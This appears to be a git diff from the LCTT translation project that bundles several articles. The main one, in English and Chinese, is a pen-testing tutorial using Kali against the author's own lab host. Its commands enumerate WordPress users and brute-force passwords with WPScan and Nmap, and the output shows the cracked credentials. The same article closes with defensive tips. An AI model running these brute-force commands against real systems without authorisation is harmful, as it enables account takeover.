This Nmap script is one of many possible scripts I could have used, and scanning the URL with WPScan is just one of many possible tasks this tool can do. You can decide which you would prefer to use
This WPScan example shows the password at the end of the file:
```
┌──(root💀kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
_______________________________________________________________
        __              _______   _____
        \ \     / /  __ \ / ____|
        \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
        \ \/  \/ / |  ___/ \\___ \ / __|/ _` | '_ \
                \  /\  /  | |   ____) | (__| (_| | | | |
                \/  \/   |_|    |_____/ \\___|\\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team
                        Version 3.8.10
        Sponsored by Automattic - <https://automattic.com/>
        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://vulnerable.usersys.redhat.com/> [10.19.47.242]
[+] Started: Thu Feb 18 20:32:13 2021
Interesting Finding(s):
…..
[+] Performing password attack on Wp Login against 1 user/s
Trying admin / redhat Time: 00:01:57 &lt;==================================================================================================================&gt; (3231 / 3231) 100.00% Time: 00:01:57
Trying admin / redhat Time: 00:01:57 &lt;=========================================================                                                         &gt; (3231 / 6462) 50.00%  ETA: ??:??:??
[SUCCESS] - admin / redhat                                                                                                                                                                      
[!] Valid Combinations Found:
 | Username: admin, Password: redhat
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at <https://wpscan.com/register>
[+] Finished: Thu Feb 18 20:34:15 2021
[+] Requests Done: 3255
[+] Cached Requests: 34
[+] Data Sent: 1.066 MB
[+] Data Received: 24.513 MB
[+] Memory used: 264.023 MB
[+] Elapsed time: 00:02:02
```
The Valid Combinations Found section near the end contains the admin username and password. It took only two minutes to go through 3,231 lines.
I have another dictionary file with 3,238,659,984 unique entries, which would take much longer and leave a lot more evidence.
Using Nmap produces a result much faster:
```
┌──(root💀kali)-[~]
└─# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 vulnerable.usersys.redhat.com
Starting Nmap 7.91 ( <https://nmap.org> ) at 2021-02-18 20:48 EST
Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 8.0 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
| http-wordpress-brute:
|   Accounts:
|       admin:redhat - Valid credentials              &lt;&lt;&lt;&lt;&lt;&lt;&lt;
|       pgervase:redhat - Valid credentials         &lt;&lt;&lt;&lt;&lt;&lt;&lt;
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version     port/proto  service
|   100000  2,3,4       111/tcp   rpcbind
|   100000  2,3,4       111/udp   rpcbind
|   100000  3,4         111/tcp6  rpcbind
|_  100000  3,4         111/udp6  rpcbind
3306/tcp open  mysql   MySQL 5.5.5-10.3.27-MariaDB
MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
```
However, running a scan like this can leave a flood of HTTPD logging messages on the target system:
```
10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
```
To get information about the HTTPS server found in my initial Nmap scan, I used the `sslscan` command:
```
┌──(root💀kali)-[~]
└─# sslscan vulnerable.usersys.redhat.com
Version: 2.0.6-static
OpenSSL 1.1.1i-dev  xx XXX xxxx
Connected to 10.19.47.242
Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com
  SSL/TLS Protocols:
SSLv2   disabled
SSLv3   disabled
TLSv1.0   disabled
TLSv1.1   disabled
TLSv1.2   enabled
TLSv1.3   enabled
&lt;snip&gt;
```
This shows information about the enabled SSL protocols and, further down in the output, information about the Heartbleed vulnerability:
```
  Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
```
### Tips for preventing or mitigating attackers
There are many ways to defend your systems against the multitude of attackers out there. A few key points are:
* **Know your systems:** This includes knowing which ports are open, what ports should be open, who should be able to see those open ports, and what is the expected traffic on those services. Nmap is a great tool to learn about systems on the network.
* **Use current best practices:** What is considered a best practice today might not be a best practice down the road. As an admin, it's important to stay up to date on trends in the infosec realm.
* **Know how to use your products:** For example, rather than letting an attacker continually hammer away at your WordPress system, block their IP address and limit the number of times they can try to log in before getting blocked. Blocking the IP address might not be as helpful in the real world because attackers are likely to use compromised systems to launch attacks. However, it's an easy setting to enable and could block some attacks.
* **Maintain and verify good backups:** If an attacker comprises one or more of your systems, being able to rebuild from known good and clean backups could save lots of time and money.
* **Check your logs:** As the examples above show, scanning and penetration commands may leave lots of logs indicating that an attacker is targeting the system. If you notice them, you can take preemptive action to mitigate the risk.
* **Update your systems, their applications, and any extra modules:** As [NIST Special Publication 800-40r3][9] explains, "patches are usually the most effective way to mitigate software flaw vulnerabilities, and are often the only fully effective solution."
* **Use the tools your vendors provide:** Vendors have different tools to help you maintain their systems, so make sure you take advantage of them. For example, [Red Hat Insights][10], included with Red Hat Enterprise Linux subscriptions, can help tune your systems and alert you to potential security threats.
### Learn more
This introduction to security tools and how to use them is just the tip of the iceberg. To dive deeper, you might want to look into the following resources:
* [Armitage][11], an open source attack management tool
* [Red Hat Product Security Center][12]
* [Red Hat Security Channel][13]
* [NIST's Cybersecurity page][14]
* [Using Nmap results to help harden Linux systems][6]
--------------------------------------------------------------------------------
via: https://opensource.com/article/21/5/linux-security-tools
作者:[Peter Gervase][a]
选题:[lujun9972][b]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://opensource.com/users/pgervase
[b]: https://github.com/lujun9972
[1]: https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/find-file-linux-code_magnifying_glass_zero.png?itok=E2HoPDg0 (Magnifying glass on code)
[2]: https://www.kali.org/
[3]: https://opensource.com/sites/default/files/uploads/kali-tools.png (Kali's tools)
[4]: https://creativecommons.org/licenses/by-sa/4.0/
[5]: https://wpscan.com/wordpress-security-scanner
[6]: https://www.redhat.com/sysadmin/using-nmap-harden-systems
[7]: https://opensource.com/sites/default/files/uploads/nmap-scan.png (Nmap scan)
[8]: https://opensource.com/sites/default/files/uploads/nmap-port80.png (Nmap scan of port 80)
[9]: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf%5D(https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf
[10]: https://www.redhat.com/sysadmin/how-red-hat-insights
[11]: https://en.wikipedia.org/wiki/Armitage_(computing)
[12]: https://access.redhat.com/security
[13]: https://www.redhat.com/en/blog/channel/security
[14]: https://www.nist.gov/cybersecurity

View File

@ -2,7 +2,7 @@
[#]: via: (https://opensource.com/article/21/7/kubectl)
[#]: author: (Alan Smithee https://opensource.com/users/alansmithee)
[#]: collector: (lujun9972)
[#]: translator: ( )
[#]: translator: (geekpi)
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )

View File

@ -1,139 +0,0 @@
[#]: subject: (How to Change Lock and Login Screen Wallpaper in elementary OS)
[#]: via: (https://www.debugpoint.com/2021/07/change-lock-login-screen-background-elementary-os/)
[#]: author: (Arindam https://www.debugpoint.com/author/admin1/)
[#]: collector: (lujun9972)
[#]: translator: (geekpi)
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
How to Change Lock and Login Screen Wallpaper in elementary OS
======
This tutorial explains the steps you need to change lock and login
screen background in elementary OS. This will replace the default grey
background.
Changing the lock or login screen background grey default wallpaper in elementary OS is a bit difficult. The typical greeter configuration change with the path of the image file would not work.
Unfortunately, its not an easier solution because the grey background is an image file and its data is hard coded in the greeter and need to be recompiled with new image to make it work.
Heres how.
![Lock / Login screen background elementary OS \(Odin\)][1]
### Change Lock and Login Screen Background elementary OS
* Open a terminal in your elementary OS.
* Install git and following dependencies for [greeter package][2].
```
sudo apt install git
```
```
sudo apt install -y gnome-settings-daemon libaccountsservice-dev libgdk-pixbuf2.0-dev libgranite-dev libgtk-3-dev libhandy-1-dev liblightdm-gobject-1-dev libmutter-6-dev libwingpanel-dev libx11-dev meson valac
```
* Go to temporary /tmp directory and clone the latest greeter master branch from GitHub.
```
cd /tmp
git clone https://github.com/elementary/greeter.git
```
* After cloning is complete, open the path `/tmp/greeter/data` in a file manager.
* The elementary OS uses a PNG file of 100×100 px as default background in the login screen/lock screen. The image is tiled, and it gives an impression of grey background.
* Rename your desired wallpaper image with `texture.png` and overwrite the following file in the path.
![gray background is created using this file][3]
```
/tmp/greeter/data/texture.png
```
* Open the file `/tmp/greeter/compositor/SystemBackground.vala` in a text editor and replace the following line
![change the path of image][4]
```
resource:///io/elementary/desktop/gala/texture.png
```
With
```
resource:///io/elementary/greeter/texture.png
```
* Save the file.
* Open the terminal again and build `greeter` using the following commands.
```
cd /tmp/greeter
meson _build --prefix=/usr
sudo ninja install -C _build
```
![building greeter][5]
* If you face any build error, let me know in the comment below. You should not be seeing any error, as I have tested it.
[][6]
SEE ALSO:   elementary OS 5.1 Hera Released. Heres Whats New
After the above commands are complete, you can test the login screen by running lightdm in test mode
```
lightdm --test-mode --debug
```
If it looks good, reboot the system. And you should be seeing your wallpaper in the login screen in elementary OS.
This guide should work in [elementary OS 6 Odin][7], elementary OS 5 Juno and below.
### Closing Notes
I hope this guide helps you to change the background of lock or login screen in your elementary OS. Honestly, its 2021 and changing a background image of login screen requires compilation of code surprises me.
If you run into error, let me know in the comment box below.
* * *
--------------------------------------------------------------------------------
via: https://www.debugpoint.com/2021/07/change-lock-login-screen-background-elementary-os/
作者:[Arindam][a]
选题:[lujun9972][b]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://www.debugpoint.com/author/admin1/
[b]: https://github.com/lujun9972
[1]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/elementary-OS-Login-Screen-in-Odin-1024x768.jpg
[2]: https://github.com/elementary/greeter
[3]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/gray-background-is-created-using-this-file.jpg
[4]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/change-the-path-of-image-1024x450.jpg
[5]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/building-greeter.png
[6]: https://www.debugpoint.com/2019/12/elementary-os-hera-released/
[7]: https://www.debugpoint.com/tag/elementary-os-6

View File

@ -1,109 +0,0 @@
[#]: subject: (Windows 11 Makes Your Hardware Obsolete, Use Linux Instead!)
[#]: via: (https://news.itsfoss.com/windows-11-linux/)
[#]: author: (Ankush Das https://news.itsfoss.com/author/ankush/)
[#]: collector: (lujun9972)
[#]: translator: (zd200572)
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
Windows 11 让你的硬件过时使用Linux代替吧
======
Windows 11终于来了我们并不完全对此感到兴奋 -但它给许多电脑用户带来了问题。
我甚至不会讨论隐私方面或者它的设计选择。可是Windows 11要求更新的硬件这会让你的旧电脑在某种程度上过时没有好的理由却强迫你升级新的硬件。
Windows 11的到来还有什么问题有什么不好的
### 只有符合条件的设备才能获得Windows 11升级
首先Windows 11有趣在添加了一个看起来不错的最低系统需求:
* 1GHz双核64位处理器
* 4GB内存
* 64GB存储空间
* 支持 UEFI 安全启动
* 受信任的平台模块 (TPM) 版本 2.0
* DirectX 12兼容显卡
* 720P分辨率显示器
![][1]
你可以在[微软官方网站][2]下载电脑健康状况检查应用检查你的系统是否有升级的资格。
过去十年内的大多数电脑能达到这些标准--但有一个陷阱。
硬件需要有一个TPM芯片一些电脑和笔记本可能没有。幸运的是您可能只需要从BIOS设置(包括安全引导支持)中启用它就可以使你的PC符合条件。这里有一个[PCGamer][3]的向导可以帮你.
技术上说根据微软官方文档Windows 11不支持比**Intel第8代和Ryzen3000系列**更老的处理器([AMD][4] | [Intel][5]).
可是,有相当数量的电脑失去支持,你该怎么做?
简单, [**2021年啦换成Linux吧**][6]在Windows 10不再收到更新之前. 今年在你的个人电脑上尝试Linux变得比任何时候更有意义。
### Windows 11安装需要网络连接
![][7]
虽然我们不太清楚但根据其系统要求规范Windows 11安装过程中将要求用户有可连通的网络连接。
但是Linux不需要这样.
这只是其中一个[使用Linux而不是Windows][8]的好处 -你可以完全的掌控操作系统。
### 没有32位支持
![][7]
Windows 10确实是支持32位系统的但是Windows 11终结了相关支持.
这又是Linux的优势了。
尽管32位支持都在逐渐减少, 我们依然有一系列[**支持32位系统的Linux发行版**][9]. 或许你的32位电脑还能与Linux一起工作10年。
### Windows 10将在2025年结束支持
好吧这是意料之外的鉴于微软最初计划Windows 10是其最后一款独立发布的操作系统这是出乎意料的。
现在Windows 10将会在2025年被杀死…
那么我们该怎么做呢升级你的硬件只因为它不支持Windows 11?
除非有这个必要否则Linux是你永远的朋友。
你可以尝试几个[**轻量级Linux发行版**][10],它们将复活你的微软认为过时的电脑。
### 总结
尽管在未来几年Windows 11计划强迫用户升级他们的硬件Linux将让你长时间继续使用你的硬件并有额外的好处。
因此如果你对Windows 11不满你可能想开始使用Linux代替。不要烦恼你可以参考我们主站的教程[FOSS][11]来学习开始使用Linux的一切!
--------------------------------------------------------------------------------
via: https://news.itsfoss.com/windows-11-linux/
作者:[Ankush Das][a]
选题:[lujun9972][b]
译者:[zd200572](https://github.com/zd200572)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://news.itsfoss.com/author/ankush/
[b]: https://github.com/lujun9972
[1]: data:image/svg+xml;base64,PHN2ZyBoZWlnaHQ9IjIyNSIgd2lkdGg9Ijc4MCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB2ZXJzaW9uPSIxLjEiLz4=
[2]: https://www.microsoft.com/en-us/windows/windows-11
[3]: https://www.pcgamer.com/Windows-11-PC-Health-Check/
[4]: https://docs.microsoft.com/en-us/windows-hardware/design/minimum/supported/windows-11-supported-amd-processors
[5]: https://docs.microsoft.com/en-us/windows-hardware/design/minimum/supported/windows-11-supported-intel-processors
[6]: https://news.itsfoss.com/switch-to-linux-in-2021/
[7]: data:image/svg+xml;base64,PHN2ZyBoZWlnaHQ9IjQzOSIgd2lkdGg9Ijc4MCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB2ZXJzaW9uPSIxLjEiLz4=
[8]: https://itsfoss.com/linux-better-than-windows/
[9]: https://itsfoss.com/32-bit-linux-distributions/
[10]: https://itsfoss.com/lightweight-linux-beginners/
[11]: https://itsfoss.com

View File

@ -0,0 +1,296 @@
[#]: subject: "Pen testing with Linux security tools"
[#]: via: "https://opensource.com/article/21/5/linux-security-tools"
[#]: author: "Peter Gervase https://opensource.com/users/pgervase"
[#]: collector: "lujun9972"
[#]: translator: "MjSeven"
[#]: reviewer: " "
[#]: publisher: " "
[#]: url: " "
使用 Linux 安全工具进行渗透测试
======
使用 Kali Linux 和其他开源工具来发现系统中的安全漏洞和弱点。
![Magnifying glass on code][1]
大量广泛报道的大型消费企业入侵事件凸显了系统安全管理的重要性。幸运的是,有许多不同的应用程序可以帮助保护计算机系统。其中一个是 [Kali][2],一个为安全和渗透测试而开发的 Linux 发行版。本文演示了如何使用 Kali Linux 来审视你的系统以发现威胁。
Kali 安装了很多工具,它们都是开源的,默认情况下安装它们会让事情变得更容易。
![Kali's tools][3]
(Peter Gervase, [CC BY-SA 4.0][4])
本文使用的系统是:
1. `kali.usersts.redhat.com`:我会启动扫描和攻击的系统。它拥有 30GB 内存和 6 个虚拟 CPU(vCPU)。
2. `vulnerable.usersys.redhat.com`: Red Hat 企业版 Linux 8 系统,它也会成为目标。它拥有 16GB 内存和 6 个 vCPU。它是一个相对较新的系统但有些软件包可能已经过时。
3. 这个系统还将包括 `httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7.x86_64``mariadb-server-10.3.27-3.module+el8.3.0+8972+5e3224e9.x86_64``tigervnc-server-1.9.0-15.el8_1.x86_64``vsftpd-3.0.3-32.el8.x86_64` 和一个 5.6.1 版本的 WordPress。
我在上面列出了硬件规格,因为一些任务要求很高,尤其是在运行 WordPress 安全扫描程序([WPScan][5])时对目标系统 CPU 的要求。
### 探测你的系统
首先,我会在目标系统上进行基本的 Nmap 扫描(你可以阅读[使用 Nmap 结果帮助加固 Linux 系统][6]一文来更深入地了解 Nmap。Nmap 扫描是一种快速的方法,可以大致了解被测系统中哪些端口和服务是暴露的。
![Nmap scan][7]
(Peter Gervase, [CC BY-SA 4.0][4])
默认扫描显示有几个你可能感兴趣的开放端口。实际上,任何开放端口都可能成为攻击者破坏你网络的一种方式。在本例中,端口 21、22、80 和 443 很容易扫描,因为它们是常用服务的端口。在这个早期阶段,我只是在做侦察工作,尽可能多地获取有关目标系统的信息。
我想用 Nmap 侦察 80 端口,所以我使用 `-p 80` 参数来查看端口 80`-A` 参数来获取操作系统和应用程序版本等信息。
![Nmap scan of port 80][8]
(Peter Gervase, [CC BY-SA 4.0][4])
关键信息有:
```bash
PORT   STATE SERVICE VERSION
80/tcp open  http       Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-generator: WordPress 5.6.1
```
现在我知道了这是一个 WordPress 服务器,我可以使用 WPScan 来获取有关潜在威胁的信息。一个很好的侦察方法是尝试找到一些用户名,使用 `--enumerate u` 告诉 WPScan 在 WordPress 实例中查找用户名。例如:
```bash
┌──(root💀kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
_______________________________________________________________
        __              _______   _____
        \ \     / /  __ \ / ____|
        \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
        \ \/  \/ / |  ___/ \\___ \ / __|/ _` | '_ \
                \  /\  /  | |   ____) | (__| (_| | | | |
                \/  \/   |_|    |_____/ \\___|\\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team
                        Version 3.8.10
        Sponsored by Automattic - <https://automattic.com/>
        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://vulnerable.usersys.redhat.com/> [10.19.47.242]
[+] Started: Tue Feb 16 21:38:49 2021
Interesting Finding(s):
...
[i] User(s) Identified:
[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
[+] pgervase
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
```
显示有两个用户:`admin` 和 `pgervase`。我将尝试使用密码字典来猜测 `admin` 的密码。密码字典是一个包含很多密码的文本文件。我使用的字典大小有 37G有 3,543,076,137 行。
就像你可以选择不同的文本编辑器、Web 浏览器和其他应用程序 一样,也有很多工具可以启动密码攻击。下面是两个使用 Nmap 和 WPScan 的示例命令:
```shell
# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com
```
```bash
# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt
```
这个 Nmap 脚本是我使用的许多脚本之一,使用 WPScan 扫描 URL 只是这个工具可以完成的许多任务之一。你可以决定你喜欢的那一个。
WPScan 示例在文件末尾显示了密码:
```bash
┌──(root💀kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Thu Feb 18 20:32:13 2021
Interesting Finding(s):
…..
[+] Performing password attack on Wp Login against 1 user/s
Trying admin / redhat Time: 00:01:57 <==================================================================================================================> (3231 / 3231) 100.00% Time: 00:01:57
Trying admin / redhat Time: 00:01:57 <========================================================= > (3231 / 6462) 50.00% ETA: ??:??:??
[SUCCESS] - admin / redhat
[!] Valid Combinations Found:
| Username: admin, Password: redhat
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Feb 18 20:34:15 2021
[+] Requests Done: 3255
[+] Cached Requests: 34
[+] Data Sent: 1.066 MB
[+] Data Received: 24.513 MB
[+] Memory used: 264.023 MB
[+] Elapsed time: 00:02:02
```
在末尾的有效组合部分包含管理员用户名和密码3231 行只用了两分钟。
我还有另一个字典文件,其中包含 3,238,659,984 行,使用它花费的时间更长并且会留下更多的证据。
使用 Nmap 可以更快地产生结果:
```
┌──(root💀kali)-[~]
└─# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 vulnerable.usersys.redhat.com
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
| http-wordpress-brute:
| Accounts:
| admin:redhat - Valid credentials <<<<<<<
| pgervase:redhat - Valid credentials <<<<<<<
|_ Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB
MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
```
然而,运行这样的扫描可能会在目标系统上留下大量的 HTTPD 日志消息:
```shell
10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "<http://vulnerable.usersys.redhat.com/>" "WPScan v3.8.10 (<https://wpscan.org/>)"
```
为了获得关于在最初的 Nmap 扫描中发现的 HTTPS 服务器的信息,我使用了 `sslscan` 命令:
```bash
┌──(root💀kali)-[~]
└─# sslscan vulnerable.usersys.redhat.com
Version: 2.0.6-static
OpenSSL 1.1.1i-dev xx XXX xxxx
Connected to 10.19.47.242
Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 disabled
TLSv1.1 disabled
TLSv1.2 enabled
TLSv1.3 enabled
<snip>
```
它显示了有关启用的 SSL 协议的信息,在最下方,是关于 Heartbleed 漏洞的信息:
```bash
  Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
```
### 防御或减轻攻击的技巧
有很多方法可以保护你的系统免受大量攻击。几个关键点是:
* **了解你的系统:**包括了解哪些端口是开放的哪些端口应该开放谁应该能够看到这些开放的端口以及使用这些端口服务的预期流量是多少。Nmap 是了解网络系统的一个绝佳工具。
* **使用最新的最佳实践:** 现在的最佳实践可能不是未来的最佳实践。作为管理员,了解信息安全领域的最新趋势非常重要。
* **知道如何使用你的产品:** 例如,与其让攻击者不断攻击你的 WordPress 系统,不如阻止他们的 IP 地址并限制尝试登录的次数。在现实世界中,阻止 IP 地址可能没有那么有用,因为攻击者可能会使用受感染的系统来发起攻击。但是,这是一个很容易启用的设置,可以阻止一些攻击。
* **维护和验证良好的备份:** 如果攻击者攻击了一个或多个系统,能从已知的良好和干净的备份中重新构建可以节省大量时间和金钱。
* **检查日志:** 如上所示,扫描和渗透命令可能会留下大量日志,这表明攻击者正在攻击系统。如果你注意到它们,可以采取先发制人的行动来降低风险。
* **更新系统、应用程序和任何额外的模块:** 正如 [NIST Special Publication 800-40r3][9] 所解释的那样,“补丁通常是减轻软件缺陷漏洞最有效的方法,而且通常是唯一完全有效的解决方案。”
* **使用供应商提供的工具:** 供应商有不同的工具来帮助你维护他们的系统,因此一定要充分利用它们。例如,红帽企业 Linux 订阅中包含的 [Red Hat Insights][10] 可以帮助你优化系统并提醒你注意潜在的安全威胁。
### 了解更多
本文对安全工具及其使用方法的介绍只是冰山一角。深入了解的话,你可能需要查看以下资源:
* [Armitage][11],一个开源的攻击管理工具
* [Red Hat 产品安全中心][12]
* [Red Hat 安全频道][13]
* [NIST 网络安全页面][14]
* [使用 Nmap 结果来帮助加固 Linux 系统][6]
--------------------------------------------------------------------------------
via: https://opensource.com/article/21/5/linux-security-tools
作者:[Peter Gervase][a]
选题:[lujun9972][b]
译者:[MjSeven](https://github.com/MjSeven)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://opensource.com/users/pgervase
[b]: https://github.com/lujun9972
[1]: https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/find-file-linux-code_magnifying_glass_zero.png?itok=E2HoPDg0 "Magnifying glass on code"
[2]: https://www.kali.org/
